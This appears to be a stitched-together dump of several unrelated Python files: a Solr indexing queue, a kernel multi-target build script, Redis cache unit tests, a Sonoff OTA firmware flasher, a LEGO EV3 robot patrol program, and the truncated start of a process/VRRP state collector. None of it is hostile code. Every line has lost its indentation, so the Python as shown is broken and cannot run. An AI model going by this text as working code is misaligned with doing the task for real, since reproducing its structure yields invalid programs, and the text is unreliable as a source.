def add(self, index_cls, using, instances):
ids = [instance.id for instance in instances]
LOGGER.debug("Solr queue add %s", ids)
try:
self._queue.put( (index_cls, using, ids, 0) )
except Full:
LOGGER.warning("Solr queue full")
def delete(self, index_cls, using, instances):
ids = [get_identifier(instance) for instance in instances]
LOGGER.debug("Solr queue delete %s", ids)
try:
self._queue.put( (index_cls, using, ids, 1) )
except Full:
LOGGER.warning("Solr queue full")
def setup(self, app=None):
if app:
app["solrqueue"] = self
app.on_startup.append(self.app_start)
app.on_cleanup.append(self.app_stop)
self._prev_queue = TxnAwareSearchIndex._backend_queue
TxnAwareSearchIndex._backend_queue = self
async def app_start(self, _app=None):
self.start()
async def app_stop(self, _app=None):
self.stop()
def __enter__(self):
self.setup()
self.start()
return self
def __exit__(self, type, value, tb):
# if handling exception, don't wait for worker thread
self.stop(not type)
TxnAwareSearchIndex._backend_queue = self._prev_queue
def start(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self, join=True):
self._stop.set()
self._trigger.set()
if join:
self._thread.join()
def trigger(self):
self._trigger.set()
def _run(self):
while True:
self._trigger.wait(5)
self._drain()
if self._stop.is_set():
return
def _drain(self):
last_index = None
last_using = None
last_del = 0
last_ids = set()
while True:
try:
index_cls, using, ids, delete = self._queue.get_nowait()
except Empty:
index_cls = None
if last_index and last_index == index_cls and last_using == using and last_del == delete:
last_ids.update(ids)
else:
if last_index:
if last_del:
self.remove(last_index, last_using, last_ids)
else:
self.update(last_index, last_using, last_ids)
if not index_cls:
break
last_index = index_cls
last_using = using
last_del = delete
last_ids = set(ids)
def update(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Updating %d row(s) in solr queue: %s", len(ids), ids)
rows = index.index_queryset(using).filter(id__in=ids)
backend.update(index, rows)
def remove(self, index_cls, using, ids):
index = index_cls()
backend = index.get_backend(using)
if backend is not None:
LOGGER.debug("Removing %d row(s) in solr queue: %s", len(ids), ids)
# backend.remove has no support for a list of IDs
backend.conn.delete(id=ids)
|
build-all.py | #! /usr/bin/env python2
# Copyright (c) 2009-2015, 2017, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
from collections import namedtuple
import glob
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import threading
import Queue
version = 'build-all.py, version 1.99'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
all_options = {}
compile64 = os.environ.get('CROSS_COMPILE64')
clang_bin = os.environ.get('CLANG_BIN')
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
if not os.environ.get('CROSS_COMPILE'):
fail("CROSS_COMPILE must be set in the environment")
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if not os.path.isfile('MAINTAINERS'):
fail("This doesn't seem to be a kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
failed_targets = []
BuildResult = namedtuple('BuildResult', ['status', 'messages'])
class BuildSequence(namedtuple('BuildSequence', ['log_name', 'short_name', 'steps'])):
def set_width(self, width):
self.width = width
def __enter__(self):
self.log = open(self.log_name, 'w')
def __exit__(self, type, value, traceback):
self.log.close()
def run(self):
self.status = None
messages = ["Building: " + self.short_name]
def printer(line):
text = "[%-*s] %s" % (self.width, self.short_name, line)
messages.append(text)
self.log.write(text)
self.log.write('\n')
for step in self.steps:
st = step.run(printer)
if st:
self.status = BuildResult(self.short_name, messages)
break
if not self.status:
self.status = BuildResult(None, messages)
class BuildTracker:
"""Manages all of the steps necessary to perform a build. The
build consists of one or more sequences of steps. The different
sequences can be processed independently, while the steps within a
sequence must be done in order."""
def __init__(self, parallel_builds):
self.sequence = []
self.lock = threading.Lock()
self.parallel_builds = parallel_builds
def add_sequence(self, log_name, short_name, steps):
self.sequence.append(BuildSequence(log_name, short_name, steps))
def longest_name(self):
longest = 0
for seq in self.sequence:
longest = max(longest, len(seq.short_name))
return longest
def __repr__(self):
return "BuildTracker(%s)" % self.sequence
def run_child(self, seq):
seq.set_width(self.longest)
tok = self.build_tokens.get()
with self.lock:
print "Building:", seq.short_name
with seq:
seq.run()
self.results.put(seq.status)
self.build_tokens.put(tok)
def run(self):
self.longest = self.longest_name()
self.results = Queue.Queue()
children = []
errors = []
self.build_tokens = Queue.Queue()
nthreads = self.parallel_builds
print "Building with", nthreads, "threads"
for i in range(nthreads):
self.build_tokens.put(True)
for seq in self.sequence:
child = threading.Thread(target=self.run_child, args=[seq])
children.append(child)
child.start()
for child in children:
stats = self.results.get()
if all_options.verbose:
with self.lock:
for line in stats.messages:
print line
sys.stdout.flush()
if stats.status:
errors.append(stats.status)
for child in children:
child.join()
if errors:
fail("\n ".join(["Failed targets:"] + errors))
class PrintStep:
"""A step that just prints a message"""
def __init__(self, message):
self.message = message
def run(self, outp):
outp(self.message)
class MkdirStep:
"""A step that makes a directory"""
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("mkdir %s" % self.direc)
os.mkdir(self.direc)
class RmtreeStep:
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("rmtree %s" % self.direc)
shutil.rmtree(self.direc, ignore_errors=True)
class CopyfileStep:
def __init__(self, src, dest):
self.src = src
self.dest = dest
def run(self, outp):
outp("cp %s %s" % (self.src, self.dest))
shutil.copyfile(self.src, self.dest)
class ExecStep:
def __init__(self, cmd, **kwargs):
self.cmd = cmd
self.kwargs = kwargs
def run(self, outp):
outp("exec: %s" % (" ".join(self.cmd),))
with open('/dev/null', 'r') as devnull:
proc = subprocess.Popen(self.cmd, stdin=devnull,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
**self.kwargs)
stdout = proc.stdout
while True:
line = stdout.readline()
if not line:
break
line = line.rstrip('\n')
outp(line)
result = proc.wait()
if result != 0:
return ('error', result)
else:
return None
class Builder():
def __init__(self, name, defconfig):
self.name = name
self.defconfig = defconfig
self.confname = re.sub('arch/arm[64]*/configs/', '', self.defconfig)
# Determine if this is a 64-bit target based on the location
# of the defconfig.
self.make_env = os.environ.copy()
if "/arm64/" in defconfig:
if compile64:
self.make_env['CROSS_COMPILE'] = compile64
else:
fail("Attempting to build 64-bit, without setting CROSS_COMPILE64")
self.make_env['ARCH'] = 'arm64'
else:
self.make_env['ARCH'] = 'arm'
self.make_env['KCONFIG_NOTIMESTAMP'] = 'true'
self.log_name = "%s/log-%s.log" % (build_dir, self.name)
def build(self):
steps = []
dest_dir = os.path.join(build_dir, self.name)
log_name = "%s/log-%s.log" % (build_dir, self.name)
steps.append(PrintStep('Building %s in %s log %s' %
(self.name, dest_dir, log_name)))
if not os.path.isdir(dest_dir):
steps.append(MkdirStep(dest_dir))
defconfig = self.defconfig
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
steps.append(RmtreeStep(os.path.join(dest_dir, staging_dir)))
steps.append(ExecStep(['make', 'O=%s' % dest_dir,
self.confname], env=self.make_env))
# Build targets can be dependent upon the completion of
# previous build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir,
'REAL_CC=%s' % clang_bin]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
steps.append(ExecStep(cmd_line + [t], env=self.make_env))
return steps
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = []
for defconfig in glob.glob('arch/arm*/configs/vendor/*_defconfig'):
target = os.path.basename(defconfig)[:-10]
name = target + "-llvm"
if 'arch/arm64' in defconfig:
name = name + "-64"
names.append(Builder(name, defconfig))
return names
def build_many(targets):
print "Building %d target(s)" % len(targets)
# To try and make up for the link phase being serial, try to do
# two full builds in parallel. Don't do too many because lots of
# parallel builds tends to use up available memory rather quickly.
parallel = 2
if all_options.jobs and all_options.jobs > 1:
j = max(all_options.jobs / parallel, 2)
make_command.append("-j" + str(j))
tracker = BuildTracker(parallel)
for target in targets:
steps = target.build()
tracker.add_sequence(target.log_name, target.name, steps)
tracker.run()
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('-j', '--jobs', type='int', dest="jobs",
help="Number of simultaneous jobs")
parser.add_option('-l', '--load-average', type='int',
dest='load_average',
help="Don't start multiple jobs unless load is below LOAD_AVERAGE")
parser.add_option('-k', '--keep-going', action='store_true',
dest='keep_going', default=False,
help="Keep building other targets if a target fails")
parser.add_option('-m', '--make-target', action='append',
help='Build the indicated make target (default: %s)' %
' '.join(make_command))
(options, args) = parser.parse_args()
global all_options
all_options = options
if options.list:
print "Available targets:"
for target in configs:
print " %s" % target.name
sys.exit(0)
if options.make_target:
make_command = options.make_target
if args == ['all']:
build_many(configs)
elif len(args) > 0:
all_configs = {}
for t in configs:
all_configs[t.name] = t
targets = []
for t in args:
if t not in all_configs:
parser.error("Target '%s' not one of %s" % (t, all_configs.keys()))
targets.append(all_configs[t])
build_many(targets)
else:
parser.error("Must specify a target to build, or 'all'")
if __name__ == "__main__":
main()
|
test_rediscache.py | #!/usr/bin/env python3
"""
This will test various scenario with the redis cache.
It requires the local redis server to be started:
sudo service redis.server start
Start with unittest
python -m unittest test_rediscache.py
Start with pytest
pytest -s
Start with coverage
coverage run --source=rediscache --module pytest
coverage report --show-missing
"""
from datetime import datetime
from logging import info, INFO, basicConfig
from threading import Thread
from time import sleep
from unittest import TestCase, main
from redis import StrictRedis
from rediscache import RedisCache
# pylint: disable=missing-class-docstring, missing-function-docstring
class TestRedisCache(TestCase):
def __init__(self, method_name: str):
self.server = StrictRedis(decode_responses=True)
super().__init__(method_name)
def setUp(self):
retour = self.server.flushdb()
info("Redis database flushed: %s", retour)
def test_key_in_redis(self):
"""
This can be tested alone with:
pytest -k test_key_in_redis
"""
rediscache = RedisCache()
@rediscache.cache(10, 20, wait=True)
def func_with_args(arg):
return arg
@rediscache.cache(10, 20, wait=True)
def func_with_args_kwargs(arg, kwarg=''):
return str(arg) + str(kwarg)
func_with_args("tata")
func_with_args_kwargs("toto", kwarg="titi")
keys = self.server.keys("*")
self.assertIn("func_with_args(tata)", keys)
self.assertIn("func_with_args_kwargs(toto,kwarg='titi')", keys)
def test_normal_cache(self):
rediscache = RedisCache()
@rediscache.cache_raw(1, 2)
def my_slow_hello(name: str) -> str:
self.server.incr('my_slow_hello')
sleep(0.3)
return f"Hello {name}!"
# Ask value to go in cache
name = 'toto'
hello = my_slow_hello(name)
# Make sure the Thread was started
sleep(0.1)
# The function was called
self.assertEqual(self.server.get('my_slow_hello'), '1')
# But we do not have the result yet?
self.assertEqual(hello, '')
# Make sure the value is in the cache
sleep(0.5)
# Get value from cache
hello = my_slow_hello(name)
self.assertEqual(hello, f"Hello {name}!")
# Still the function has only been called once
self.assertEqual(self.server.get('my_slow_hello'), '1')
def test_refresh(self):
rediscache = RedisCache()
@rediscache.cache_raw(1, 2)
def my_slow_hello(name: str) -> str:
"""
A slow function to test the Redis cache.
Each call will get a different result.
"""
sleep(0.2)
return f"Hello {name}! {datetime.utcnow()}"
# Ask value to go in cache
hello = my_slow_hello('tata')
# Make sure we have not got it yet
self.assertEqual(hello, '')
# Wait for it to arrive in cache
sleep(0.5)
# Retrieve value from cache
hello1 = my_slow_hello('tata')
# Wait for expiration of value
sleep(1)
# Retrieve value from cache again. Should be the same. But an update is on-going.
hello2 = my_slow_hello('tata')
self.assertEqual(hello1, hello2)
# Wait for cache to be updated
sleep(0.5)
# Retrieve value from cache again. This time it was updated.
hello3 = my_slow_hello('tata')
self.assertNotEqual(hello2, hello3)
def test_default(self):
default = 'Default'
rediscache = RedisCache()
@rediscache.cache_raw(1, 2, default=default)
def my_fast_hello(name: str) -> str:
return f"Hello {name}!"
# First time storing value in cache
hello = my_fast_hello('fifi')
# Value is default the first time
self.assertEqual(hello, default)
def test_fail(self):
default = 'Default'
rediscache = RedisCache()
@rediscache.cache_raw(1, 2, default=default)
def my_failling_hello(name: str) -> str:
if not name:
raise ValueError('Invalid name')
return f"Hello {name}!"
# Store value in the cache
hello = my_failling_hello('')
# Make sure we have not got it yet
self.assertEqual(hello, default)
# Wait for value to be in the cache
sleep(1.1)
# Do we get a value from the cache?
hello = my_failling_hello('')
# Only the default value is in the cache because the function failed
self.assertEqual(hello, default)
def test_expire(self):
default = 'Default'
rediscache = RedisCache()
@rediscache.cache_raw(1, 2, default=default)
def my_fast_hello(name: str) -> str:
return f"Hello {name}!"
# Store value in the cache
hello = my_fast_hello('loulou')
# Make sure we have not got it yet
self.assertEqual(hello, default)
# Wait for the value to be totally expired in the cache
sleep(3)
# Let's try and get the value from the cache
hello = my_fast_hello('loulou')
# The value is not in the cache anymore
self.assertEqual(hello, default)
def test_empty(self):
default = 'Default'
rediscache = RedisCache()
@rediscache.cache_raw(1, 2, default=default)
def my_empty_hello(name: str) -> str:
if name:
return f"Hello {name}!"
return ""
# Store value in the cache
hello = my_empty_hello('')
# Make sure we have not got it yet
self.assertEqual(hello, default)
# Wait for the value to be stored in the cache
sleep(0.5)
# Let's try and get the value from the cache
hello = my_empty_hello('')
# We also store empty strings in the cache
self.assertEqual(hello, '')
def test_no_cache(self):
rediscache = RedisCache(enabled=False)
@rediscache.cache_raw(1, 2)
def my_slow_hello(name: str) -> str:
sleep(0.5)
return f"Hello {name}!"
# Get the value directly, no cache
name = 'choux'
hello = my_slow_hello(name)
# We have the value after the first call
self.assertEqual(hello, f"Hello {name}!")
def test_no_cache_dumps(self):
rediscache = RedisCache(enabled=False)
@rediscache.cache_json(1, 2)
def my_slow_hello(name: str) -> str:
sleep(0.5)
return f"Hello {name}!"
# Get the value directly, no cache
name = 'choux'
hello = my_slow_hello(name)
# We have the value after the first call
self.assertEqual(hello, f'Hello {name}!')
def test_very_long(self):
rediscache = RedisCache()
@rediscache.cache_raw(1, 10, retry=1)
def my_very_slow_hello(name: str) -> str:
# Count how many times the function was called
self.server.incr('my_very_slow_hello')
sleep(2)
return f"Hello {name}!"
# Stores the value in the cache
my_very_slow_hello('hiboux')
# Wait after the retry
sleep(1.5)
# Do we have it now?
hello = my_very_slow_hello('hiboux')
# No, we should not
self.assertEqual(hello, '')
# Let's see how many times the function was actually called
sleep(0.1)
self.assertEqual(self.server.get('my_very_slow_hello'), '2')
def test_dict(self):
rediscache = RedisCache()
@rediscache.cache_json(1, 2)
def return_dict(name: str):
return {"hello": name}
# Stores the value in the cache
return_dict('you')
# Make sure it is in the cache
sleep(0.1)
# Get the value from the cache
hello = return_dict('you')
self.assertEqual(hello, {'hello': 'you'})
def test_dict_wait(self):
rediscache = RedisCache()
@rediscache.cache_json_wait(1, 2)
def return_dict(name: str):
sleep(0.1)
return {"hello": name}
# Stores the value in the cache and wait for the output
hello = return_dict('me')
self.assertEqual(hello, {'hello': 'me'})
def test_wait(self):
rediscache = RedisCache()
@rediscache.cache_raw_wait(1, 2)
def my_hello_wait(name: str) -> str:
sleep(0.5)
return f"hello {name}!"
# Stores the value in the cache but wait for it as well
name = 'chouchou'
hello = my_hello_wait(name)
self.assertEqual(hello, f"hello {name}!")
def test_wait_thread(self):
rediscache = RedisCache()
@rediscache.cache_raw_wait(1, 2)
def my_hello_wait(name: str) -> str:
sleep(0.5)
return f"hello {name}!"
name = 'bob'
# Store the value in the cache and wait in another thread
thread = Thread(target=my_hello_wait, args=(name,))
thread.start()
# Make sure the thread is started but not enough that it would be completed
sleep(0.2)
# Now we still wait for the value
hello = my_hello_wait(name)
self.assertEqual(hello, f"hello {name}!")
def test_no_decode(self):
my_byte_string = b'This is a byte string'
rediscache = RedisCache(decode=False)
@rediscache.cache_raw_wait(1, 2)
def my_bytes() -> bytes:
sleep(0.1)
return my_byte_string
# Store the value in the cache and wait
value = my_bytes()
self.assertEqual(value, my_byte_string)
# Wait for the value to reach the cache
sleep(0.2)
# Get the same value from the cache
value = my_bytes()
self.assertEqual(value, my_byte_string)
def test_decorator(self):
rediscache = RedisCache()
@rediscache.cache(1, 2)
def my_cached_hello(name: str) -> str:
"""This is my documentation"""
sleep(0.1)
return f"Hello {name}!"
self.assertEqual(my_cached_hello.__name__, "my_cached_hello")
self.assertEqual(my_cached_hello.__doc__, "This is my documentation")
# This test should run first, so it needs the be the first alphabatically.
def test_1_get_stats(self):
rediscache = RedisCache()
@rediscache.cache_raw_wait(1, 2)
def function1() -> str:
sleep(0.1)
return "Hello function 1"
@rediscache.cache(1, 2)
def function2() -> str:
sleep(0.1)
return "Hello function 2"
function1()
function2()
stats = rediscache.get_stats()
self.assertEqual(stats["Refresh"], 2)
self.assertEqual(stats["Wait"], 1)
self.assertEqual(stats["Failed"], 0)
self.assertEqual(stats["Missed"], 2)
self.assertEqual(stats["Success"], 0)
self.assertEqual(stats["Default"], 1)
function1()
function2()
stats = rediscache.get_stats()
self.assertEqual(stats["Refresh"], 2)
self.assertEqual(stats["Wait"], 1)
self.assertEqual(stats["Failed"], 0)
self.assertEqual(stats["Missed"], 3)
self.assertEqual(stats["Success"], 1)
self.assertEqual(stats["Default"], 2)
sleep(0.2)
function1()
function2()
stats = rediscache.get_stats(delete=True)
self.assertEqual(stats["Refresh"], 2)
self.assertEqual(stats["Wait"], 1)
self.assertEqual(stats["Failed"], 0)
self.assertEqual(stats["Missed"], 3)
self.assertEqual(stats["Success"], 3)
self.assertEqual(stats["Default"], 2)
stats = rediscache.get_stats()
self.assertEqual(stats["Refresh"], 0)
self.assertEqual(stats["Wait"], 0)
self.assertEqual(stats["Failed"], 0)
self.assertEqual(stats["Missed"], 0)
self.assertEqual(stats["Success"], 0)
self.assertEqual(stats["Default"], 0)
if __name__ == "__main__":
basicConfig(level=INFO)
main()
|
main.py | from zeroconf import ServiceBrowser, Zeroconf, IPVersion
from simple_term_menu import TerminalMenu
import os
import time
import hashlib
import multiprocessing
import requests
import socket
import server
DEVEL = False
class ZeroconfListener():
"""
Listener definition used by Zeroconf.
Collects all discovered devices into the discovered list.
"""
def __init__(self):
self.discovered = []
def remove_service(self, zeroconf, type, name):
print("Service %s removed" % (name,))
print('\n')
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
if info:
id_ = info.properties["id".encode()].decode()
ip = info.parsed_addresses(IPVersion.V4Only)[0]
port = info.port
print("discovered {} {} {}".format(id_, ip, port))
self.discovered.append((id_, ip, port))
def get_ip():
"""Get the ip of the host computer"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('1.1.1.1', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
def main():
"""
1. Identify all sonoff diy devices and select one to upload the
firmware
2. Enter the filepath of the new firmware
3. HTTP server starts, serving the firmware's directory. This exposes
that specific directory over the lan!
4. Send a POST request to the device to unlock OTA
5. Send a POST request to the device to get the new firmware,
served from the HTTP server
6. Wait for 10 minutes(hardcoded) to finish the file transmission.
If the Sonoff device has rebooted, feel free to kill the process
with Ctrl+C. As long as data are transfered to the sonoff device
you will see the requests made to the HTTP server.
Good luck
"""
zeroconf = Zeroconf()
print("Browsing sonoff devices...\n\n")
listener = ZeroconfListener()
browser = ServiceBrowser(zeroconf, "_ewelink._tcp.local.", listener, delay=1000)
try:
input("Press enter to stop discovering...\n\n")
finally:
zeroconf.close()
discovered = listener.discovered
if not discovered and not DEVEL:
raise Exception("Nothing is discovered...")
if DEVEL and not discovered:
discovered.append(("1000b8df0d", "192.168.20.187", "8081"))
print("Totaly {} devices were discovered...\n".format(len(discovered)))
print("Select from the list:\n")
options = ["{}: {} {}".format(d[0], d[1], d[2]) for d in discovered]
terminal_menu = TerminalMenu(options)
i = terminal_menu.show()
id_ = discovered[i][0]
ip = discovered[i][1]
port = discovered[i][2]
print("Selected device: {} with ip: {}\n".format(id_, ip))
firmware = input("Enter the filepath of the firmware:\n")
if not os.path.isfile(firmware):
raise Exception("{} is not a file".format(firmware))
if os.stat(firmware).st_size > 508000:
raise Exception("{} is larger than 508KB.".format(firmware))
directory = os.path.dirname(firmware)
# Start http file server
print("Starting HTTP server...")
p = multiprocessing.Process(target=server.main, args=(directory,))
p.start()
try:
# Check if OTA is ulocked
url = "http://{}:{}/zeroconf/info".format(ip, port)
data = {"deviceid": '',
"data": {}}
ret = requests.post(url, json=data)
if not ret.json()["data"]["otaUnlock"]:
# Unlock OTA
print("Unlock OTA...")
url = "http://{}:{}/zeroconf/ota_unlock".format(ip, port)
data = {"deviceid": id_,
"data": {}}
ret = requests.post(url, json=data)
print(ret.status_code)
if ret.status_code == 200:
print("Done")
else:
print("OTA is unlocked.")
time.sleep(15)
# Upload new firware
print("Flash OTA...")
url = "http://{}:{}/zeroconf/ota_flash".format(ip, port)
sha256 = hashlib.sha256(open(firmware, "rb").read()).hexdigest()
download_url = "http://{}:{}/{}".format(get_ip(), server.PORT, os.path.basename(firmware))
data = {"deviceid": id_,
"data": {"downloadUrl": download_url,
"sha256sum": sha256}}
ret = requests.post(url, json=data)
print(ret)
print()
print("Wait for 10 minutes...")
print("If the firmware is updated and a tasmota wifi network appears, stop the process with Ctl+C")
time.sleep(600)
finally:
p.terminate()
if __name__ == '__main__':
main()
|
main.py | #!/usr/bin/env python3
from ev3dev2.motor import MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D, SpeedPercent, MoveSteering
from ev3dev2.sound import Sound
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import InfraredSensor, ColorSensor, TouchSensor
from time import sleep
import time, logging, threading
#---------- Documentação -------------#
# INPUT_1 - InfraredSensor
# INPUT_2 - TouchSensor
# INPUT_3
# INPUT_4 - ColorSensor
# OUTPUT_A
# OUTPUT_B - MoveTank (Motor Esquerdo)
# OUTPUT_C - MoveTank (Motor Direito)
# OUTPUT_D - MediumMotor (Motor de Tiro)
#-------------------------------------- AÇÕES ---------------------------------------#
sleep_time = 0.3
DEFAULT_SLEEP_TIMEOUT_IN_SEC = 0.05
CANAL = 3
def oneShooter():
tank_shooter = MediumMotor(OUTPUT_D)
tank_shooter.on_for_rotations(SpeedPercent(75), 4)
def walkSeconds(direction, velocity, seconds):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_seconds(direction, SpeedPercent(velocity), seconds)
def walkRotations(direction, velocity, rotations):
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
steering_drive.on_for_rotations(direction, SpeedPercent(velocity), rotations)
#-------------------------------------- MÉTODOS DE MOVIMENTO ---------------------------------------#
def walkOnly():
walkSeconds(0,50,5)
def walkRight():
walkRotations(-20,50,2)
def turnRight():
walkSeconds(100,50,1)
# walkRotations(-100,50,1)
def turnLeft():
walkRotations(-100,50,1)
def walkLeft():
walkRotations(20,50,2)
def walkBack():
walkRotations(-100,50,3)
#-------------------------------------- WORKERS ---------------------------------------#
def proxDetectWorker():
global stopMotorSensor
global stopProxSensor
global stopInfraredSensor
global infrared_sensor
shots=3
infrared_sensor.mode = 'IR-PROX'
while True:
if(stopProxSensor):
break
distance = infrared_sensor.value()
if distance < 5:
stopMotorSensor=True
time.sleep(0.5)
turnRight()
stopMotorSensor=False
t2 = threading.Thread(target=onlyWalkWorker)
t2.start()
def turnRightWorker():
global sleep_time
while True:
turnRight()
print(sleep_time)
time.sleep(sleep_time)
sleep_time=0.3
def patrulha():
global infrared_sensor
infrared_sensor.mode = 'IR-SEEK'
while True:
dis = infrared_sensor.heading_and_distance(CANAL)
if dis[0] != None and dis[1] != None:
if dis[0] < 0:
time = ((dis[0] * 2.2)/100.0) * (-1)
if time == 0:
walkSeconds(-100, 100, 0.75)
walkSeconds(-100, 100, time)
else:
time = ((dis[0] * 2.2)/100.0)
if time == 0:
walkSeconds(100, 100, 0.75)
walkSeconds(100, 100, time)
dis = infrared_sensor.heading_and_distance(CANAL)
if dis[0] != None and dis[1] != None and dis[0] > -2 and dis[0] < 2 and dis[1] < 60:
oneShooter()
else:
walkSeconds(100,50,1)
def onlyWalkWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
walkOnly()
# movimentação com paradas
def onlyWalkWithStopWorker():
global stopInfraredSensor
global stopMotorSensor
while True:
if(stopMotorSensor):
break
time.sleep(0.2)
walkRotations(0,100,2)
time.sleep(0.2)
#-------------------------------------- MAIN ---------------------------------------#
ts = TouchSensor(INPUT_2)
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
print("#################################")
while not ts.is_pressed:
time.sleep(0.2)
def main():
global stopInfraredSensor
global stopMotorSensor
global stopGiraSensor
# global stopProxSensor
global infrared_sensor
infrared_sensor = InfraredSensor(INPUT_1)
stopInfraredSensor=False
stopMotorSensor=False
stopGiraSensor=False
# stopProxSensor=False
# t1 = threading.Thread(target=robotDetectWorker)
# t1.start()
#
# t2 = threading.Thread(target=onlyWalkWithStopWorker)
# t2.start()
walkSeconds(0,100,4)
# tp = threading.Thread(target=patrulha)
# tp.start()
patrulha()
main()
main()
|
local_state_collector.py | """Collecting the states of the local system"""
import copy
from datetime import datetime
import os
import re
import signal
import threading
import time
import psutil
from forch.proto.process_state_pb2 import ProcessState, VrrpState
from forch.proto.shared_constants_pb2 import State
from forch.proto.system_state_pb2 import StateSummary
from forch.utils import dict_proto, get_logger
_DEFAULT_KEEPALIVED_PID_FILE = '/var/run/keepalived.pid'
_PROC_ATTRS = ['cmdline', 'cpu_times', 'cpu_percent', 'memory_info']
VRRP_MASTER = 'MASTER'
VRRP_BACKUP = 'BACKUP'
VRRP_FAULT = 'FAULT'
VRRP_ERROR = 'ERROR'
class LocalStateCollector:
"""Storing local system states"""
def __init__(self, config, cleanup_handler, active_state_handler, metrics):
self._process_state = {'connections': {}}
self._vrrp_state = {}
self._last_error = {}
self._current_time = None
self._conn_state = None
self._conn_state_count = 0
self._metrics = metrics
self._lock = threading.Lock()
self._target_procs = config.processes
self._check_vrrp = config.check_vrrp
self._keepalived_pid_file = os.getenv('KEEPALIVED_PID_FILE', _DEFAULT_KEEPALIVED_PID_FILE)
self._connections = config.connections
self._process_interval = config.scan_interval_sec or 60
self._cleanup_handler = cleanup_handler
self._active_state_handler = active_state_handler
self._logger = get_logger('lstate')
self._logger.info(
'Scanning %s processes every %ds', len(self._target_procs), self._process_interval)
def initialize(self):
"""Initialize LocalStateCollector"""
if not self._check_vrrp:
self._active_state_handler(State.active)
self.start_process_loop()
def get_process_summary(self):
"""Return a summary of process table"""
process_state = self.get_process_state()
return dict_proto({
'state': process_state.process_state,
'detail': process_state.process_state_detail,
'change_count': process_state.process_state_change_count,
'last_update': process_state.process_state_last_update,
'last_change': process_state.process_state_last_change
}, StateSummary)
def get_process_state(self):
"""Get the states of processes"""
with self._lock:
return dict_proto(self._process_state, ProcessState)
def get_vrrp_summary(self):
"""Return a summary of VRRP states"""
vrrp_state = self.get_vrrp_state()
if not self._check_vrrp:
summary_state = State.healthy
elif not vrrp_state.vrrp_state:
summary_state = State.initializing
elif vrrp_state.vrrp_state == VRRP_MASTER or vrrp_state.vrrp_state == VRRP_BACKUP:
summary_state = State.healthy
else:
summary_state = State.broken
return dict_proto({
'state': summary_state,
'detail': vrrp_state.vrrp_state_detail,
'change_count': vrrp_state.vrrp_state_change_count,
'last_change': vrrp_state.vrrp_state_last_change
}, StateSummary)
def get_vrrp_state(self):
"""Get VRRP states"""
with self._lock:
return dict_proto(self._vrrp_state, VrrpState)
def _check_process_info(self):
"""Check the raw information of processes"""
process_map = {}
procs = self._get_target_processes()
broken = []
# fill up process info
for target_name in self._target_procs:
